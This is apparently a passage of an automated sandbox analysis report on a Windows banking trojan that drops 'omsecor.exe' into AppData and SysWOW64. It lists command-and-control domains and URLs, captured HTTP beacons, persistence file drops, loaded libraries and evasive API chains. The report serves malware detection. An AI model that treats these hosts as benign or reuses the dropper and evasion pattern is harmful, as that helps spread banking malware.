          Source: global trafficHTTP traffic detected: GET /734/112.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /562/252.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /488/933.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /776/947.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473541|1730473447|18|6|0
          Source: global trafficDNS traffic detected: DNS query: lousta.net
          Source: global trafficDNS traffic detected: DNS query: mkkuei4kdsz.com
          Source: global trafficDNS traffic detected: DNS query: ow5dirasuek.com
          Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.ne
          Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/263/482.html
          Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/263/482.html3
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/333/645.html
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/497/157.html
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/497/157.htmlB
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/508/485.html
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/527/338.html
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/528/262.html
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/528/262.html9Tk-.
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/547/467.html
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/547/467.html4Wx
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/562/252.html
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/562/252.html.
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/562/252.htmlB
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/562/252.htmlY
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/562/252.htmlaba
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/562/252.htmlf
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/734/112.html
          Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/734/112.htmlk
          Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/740/238.html
          Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/740/238.htmlx
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/78/665.html
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/78/665.htmlH
          Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/875/87.html
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/908/776.html
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/908/776.htmlFTv-1
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/908/776.htmla0
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/956/959.html
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/956/959.html0473447
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/956/959.htmlw
          Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/353/421.html
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/353/421.html$E
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/457/998.html
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/457/998.html-559bf06f72796be679
          Source: omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/457/998.html~
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/488/933.html
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/488/933.htmlasuek.com
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/488/933.htmldZI-&
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/488/933.htmlom
          Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/516/243.html
          Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/516/243.html&
          Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/516/243.html0
          Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/516/243.htmlwLt
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/781/119.html
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/781/119.html)
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/781/119.html4
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/781/119.htmlf
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/785/70.html
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/8.htmlshqos.dll.mui
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/978/939.html
          Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/292/164.html
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/292/164.html.E
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/292/164.htmlam
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/434/722.html
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/537/167.html
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/537/167.html;Q
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/537/167.htmlwm
          Source: omsecor.exe, 00000001.00000002.1883206861.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/546/102.html
          Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/546/102.html#L
          Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/546/102.html$
          Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/546/102.html5L
          Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/546/102.html;L
          Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/546/102.htmlD
          Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/546/102.htmlULV
          Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/546/102.htmlf
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/763/794.html
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/763/794.html6Z
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/763/794.htmlZZ
          Source: omsecor.exe, 00000006.00000002.3024294943.0000000000195000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/776/947.html
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/776/947.htmlPZ
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/776/947.htmlnZ
          Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/776/947.htmlrZC-
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2259943860.0000000000194000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/945/466.html
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/945/466.html/
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/945/466.html3
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/945/466.html7
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/945/466.htmlA
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/945/466.htmlN
          Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/945/466.htmlasuek.com
          Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/en-GB
          Source: bd0wJGTae5.exe, omsecor.exe.1.dr, omsecor.exe.0.drString found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
          Source: omsecor.exe, 00000006.00000002.3024294943.0000000000195000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/p

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: Process Memory Space: bd0wJGTae5.exe PID: 6712, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 6792, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 6524, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 764, type: MEMORYSTR
          Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeFile created: C:\Windows\SysWOW64\merocz.xc6Jump to behavior
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_00401C410_2_00401C41
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_0040D2A40_2_0040D2A4
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_0040B51C0_2_0040B51C
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_0040CBD00_2_0040CBD0
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 2_2_00401C412_2_00401C41
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 2_2_0040D2A42_2_0040D2A4
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 2_2_0040B51C2_2_0040B51C
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 2_2_0040CBD02_2_0040CBD0
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: String function: 00405511 appears 56 times
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: String function: 00405511 appears 56 times
          Source: bd0wJGTae5.exeStatic PE information: invalid certificate
          Source: bd0wJGTae5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@7/3@3/3
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_0040A057 GetForegroundWindow,CoCreateInstance,SetForegroundWindow,0_2_0040A057
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeFile created: C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
          Source: bd0wJGTae5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: bd0wJGTae5.exeReversingLabs: Detection: 86%
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeFile read: C:\Users\user\Desktop\bd0wJGTae5.exeJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_2-5750
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_0-5749
          Source: unknownProcess created: C:\Users\user\Desktop\bd0wJGTae5.exe "C:\Users\user\Desktop\bd0wJGTae5.exe"
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
          Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
          Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomove
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exeJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomoveJump to behavior
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004032B8
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_0040D293 push ecx; ret 0_2_0040D2A3
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_0040CBB5 push ecx; ret 0_2_0040CBC8
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 2_2_0040D293 push ecx; ret 2_2_0040D2A3
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 2_2_0040CBB5 push ecx; ret 2_2_0040CBC8

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\SysWOW64\omsecor.exeExecutable created and started: C:\Windows\SysWOW64\omsecor.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeFile created: C:\Users\user\AppData\Roaming\omsecor.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,0_2_0040350F
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeCode function: 0_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,0_2_004039EA
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 2_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,2_2_0040350F
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 2_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,2_2_004039EA
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_0-5783
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_2-5783
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-5783
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_2-5783
          Source: C:\Users\user\Desktop\bd0wJGTae5.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-5845
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-5769
